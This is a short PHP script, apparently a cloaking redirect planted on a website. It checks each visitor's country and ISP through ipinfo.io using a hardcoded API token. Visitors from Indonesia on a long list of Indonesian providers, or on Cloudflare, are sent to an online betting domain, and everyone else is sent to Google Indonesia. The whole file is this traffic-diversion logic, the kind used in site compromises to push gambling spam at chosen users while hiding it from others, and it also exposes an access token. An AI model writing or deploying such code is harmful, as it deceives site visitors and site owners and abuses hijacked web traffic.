
$ipinfo = "ipinfo.io/".$_SERVER["HTTP_CF_CONNECTING_IP"]."/org?token=d41a9adaa59e54";
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $ipinfo);
$indoISP = strtolower(curl_exec($ch));
if ($_SERVER["HTTP_CF_IPCOUNTRY"] == "ID" &&
    (
        strpos($indoISP, "telekom") !== false ||
        strpos($indoISP, "xl axiata") !== false ||
        strpos($indoISP, "indosat") !== false ||
        strpos($indoISP, "wireless ind") !== false ||
        strpos($indoISP, "hutchison") !== false ||
        strpos($indoISP, "suiten") !== false ||
        strpos($indoISP, "internet madju") !== false ||
        strpos($indoISP, "usaha adisanggoro") !== false ||
        strpos($indoISP, "hawk teknologi") !== false ||
        strpos($indoISP, "gasatek bintang") !== false ||
        strpos($indoISP, "awinet global") !== false ||
        strpos($indoISP, "jala lintas") !== false ||
        strpos($indoISP, "surya global") !== false ||
        strpos($indoISP, "keluarga") !== false ||
        strpos($indoISP, "cahaya buana") !== false ||
        strpos($indoISP, "jembatan citra") !== false ||
        strpos($indoISP, "digi telecom") !== false ||
        strpos($indoISP, "cemerlang multi") !== false ||
        strpos($indoISP, "mayatama solus") !== false ||
        strpos($indoISP, "cyberindo adi") !== false ||
        strpos($indoISP, "mora telema") !== false ||
        strpos($indoISP, "eka mas") !== false ||
        strpos($indoISP, "fastnet") !== false ||
        strpos($indoISP, "bumi manusia") !== false ||
        strpos($indoISP, "mnc kabel") !== false ||
        strpos($indoISP, "buana visualnet") !== false ||
        strpos($indoISP, "mitra telemed") !== false ||
        strpos($indoISP, "global med") !== false ||
        strpos($indoISP, "nitnet media") !== false ||
        strpos($indoISP, "access prima") !== false ||
        strpos($indoISP, "biznet") !== false ||
        strpos($indoISP, "jaringanku saran") !== false ||
        strpos($indoISP, "sarana insan") !== false ||
        strpos($indoISP, "bali towerindo") !== false ||
        strpos($indoISP, "inovasi tjaraka") !== false ||
        strpos($indoISP, "linknet") !== false ||
        strpos($indoISP, "indonesia comnets") !== false ||
        strpos($indoISP, "lintas jaringan") !== false ||
        strpos($indoISP, "aplikanusa lintas") !== false ||
        strpos($indoISP, "wanriau indo") !== false ||
        strpos($indoISP, "kereta commut") !== false ||
        strpos($indoISP, "beon inter") !== false ||
        strpos($indoISP, "trans ind") !== false ||
        strpos($indoISP, "circlecom nusan") !== false ||
        strpos($indoISP, "rajeg med") !== false ||
        strpos($indoISP, "remala abadi") !== false ||
        strpos($indoISP, "internet banten") !== false ||
        strpos($indoISP, "mitra visioner") !== false ||
        strpos($indoISP, "smartfren") !== false ||
        strpos($indoISP, "indonusa") !== false ||
        strpos($indoISP, "mitra lintas") !== false ||
        strpos($indoISP, "media akses") !== false ||
        strpos($indoISP, "quantum") !== false ||
        strpos($indoISP, "andalan dina") !== false ||
        strpos($indoISP, "energy comp") !== false ||
        strpos($indoISP, "sima bahtera") !== false ||
        strpos($indoISP, "tunas link") !== false ||
        strpos($indoISP, "bantani media") !== false ||
        strpos($indoISP, "ardh global") !== false ||
        strpos($indoISP, "cloudflare") !== false ||
        strpos($indoISP, "indo internet") !== false
    )
) {
    header("Location: https://m.villabetting13jp.net");
    exit();
} else {
    header("Location: https://www.google.co.id/");
    exit();
}
?>